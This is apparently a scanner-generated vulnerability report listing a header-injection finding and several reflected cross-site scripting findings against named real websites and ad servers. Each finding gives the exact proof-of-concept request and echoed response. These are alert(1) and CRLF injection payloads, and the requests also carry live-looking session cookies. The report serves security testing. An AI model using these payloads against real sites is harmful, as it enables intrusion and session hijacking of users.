Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=454ba
35cbc67735f
&os=windows&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


3.8. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tos.ea.com
Path:   /legalapp/WEBPRIVACY/US/en/PC/

Issue detail

The value of REST URL parameter 3 is copied into the Content-Location response header. The payload ad77b%0d%0af03b2834043 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /legalapp/WEBPRIVACY/ad77b%0d%0af03b2834043/en/PC/ HTTP/1.1
Host: tos.ea.com
Proxy-Connection: keep-alive
Referer: http://customersupport.ea.com/loginapp/forgotScreenName.do?locale=en_US&surl=http%3A%2F%2Fsupport.ea.com%2Fci%2Fpta%2Flogin&curl=http%3A%2F%2Fsupport.ea.com%2Fapp%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:21 GMT
Server: Apache/2.0.59 (Unix) mod_jk/1.2.23
Cache-Control: no-cache
Content-Location: webprivacy/ad77b
f03b2834043
/en/pc/default/54402_6/54402_7
Content-Type: text/html;charset=UTF-8
Content-Length: 46341

<div style="text-align: center;"><span style="font-weight:
bold;">ELECTRONIC ARTS PRIVACY
POLICY</span><br><br><span style="font-weight:
bold;">Effective Date</span>: June 3, 2011
</div><a hre
...[SNIP]...

4. Cross-site scripting (reflected)  previous  next
There are 165 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload f62bc<script>alert(1)</script>2b3e2ee739c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480f62bc<script>alert(1)</script>2b3e2ee739c&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:10 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480f62bc<script>alert(1)</script>2b3e2ee739c-SM=adver_06-24-2011-13-31-10; expires=Mon, 27-Jun-2011 13:31:10 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480f62bc<script>alert(1)</script>2b3e2ee739c-VT=adver_06-24-2011-13-31-10_13822592201308922270; expires=Wed, 22-Jun-2016 13:31:10 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480f62bc<script>alert(1)</script>2b3e2ee739c-nUID=adver_13822592201308922270; expires=Fri, 24-Jun-2011 13:46:10 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480f62bc<script>alert(1)</script>2b3e2ee739c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='13822592201308922270';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';thi
...[SNIP]...

4.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload d4b45<script>alert(1)</script>3ebdfa8abb3 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adverd4b45<script>alert(1)</script>3ebdfa8abb3&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:08 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-26-48_11053703061308922008ZZZZadverd4b45%3Cscript%3Ealert%281%29%3C%2Fscript%3E3ebdfa8abb3_06-24-2011-13-31-08_15902481321308922268; expires=Wed, 22-Jun-2016 13:31:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11053703061308922008ZZZZadverd4b45%3Cscript%3Ealert%281%29%3C%2Fscript%3E3ebdfa8abb3_15902481321308922268; expires=Fri, 24-Jun-2011 13:46:08 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adverd4b45<script>alert(1)</script>3ebdfa8abb3';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15902481321308922268';t
...[SNIP]...

4.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b976e<script>alert(1)</script>1209bb882db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/b976e<script>alert(1)</script>1209bb882db&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:16 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-16_18074100621308922276; expires=Wed, 22-Jun-2016 13:31:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_18074100621308922276; expires=Fri, 24-Jun-2011 13:46:16 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='18074100621308922276';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/b976e<script>alert(1)</script>1209bb882db';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

4.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 317e7<script>alert(1)</script>655da98b355 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=317e7<script>alert(1)</script>655da98b355&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:12 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-12_14677270321308922272; expires=Wed, 22-Jun-2016 13:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14677270321308922272; expires=Fri, 24-Jun-2011 13:46:12 GMT; path=/; domain=c3metrics.com
Content-Length: 6691
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='14677270321308922272';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='317e7<script>alert(1)</script>655da98b355';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

4.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 7dc4a<script>alert(1)</script>ae80ab2d3c2 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=727dc4a<script>alert(1)</script>ae80ab2d3c2&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:12 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Sun, 24-Jul-2011 20:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-12_12674423691308922272; expires=Wed, 22-Jun-2016 13:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_12674423691308922272; expires=Fri, 24-Jun-2011 13:46:12 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12674423691308922272';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='727dc4a<script>alert(1)</script>ae80ab2d3c2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

4.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 58282<script>alert(1)</script>261c16694b8 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=58282<script>alert(1)</script>261c16694b8&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-13_6450759631308922273; expires=Wed, 22-Jun-2016 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_6450759631308922273; expires=Fri, 24-Jun-2011 13:46:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='6450759631308922273';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='58282<script>alert(1)</script>261c16694b8';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

4.7. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb131'-alert(1)-'6963b864478 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0fb131'-alert(1)-'6963b864478&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0fb131'-alert(1)-'6963b864478&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.8. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f90"-alert(1)-"9faeef96f93 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=030f90"-alert(1)-"9faeef96f93&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:21 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=030f90"-alert(1)-"9faeef96f93&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaq
...[SNIP]...

4.9. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9297"-alert(1)-"8496255074b was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=a9297"-alert(1)-"8496255074b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5856
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:32:37 GMT
Expires: Fri, 24 Jun 2011 13:32:37 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
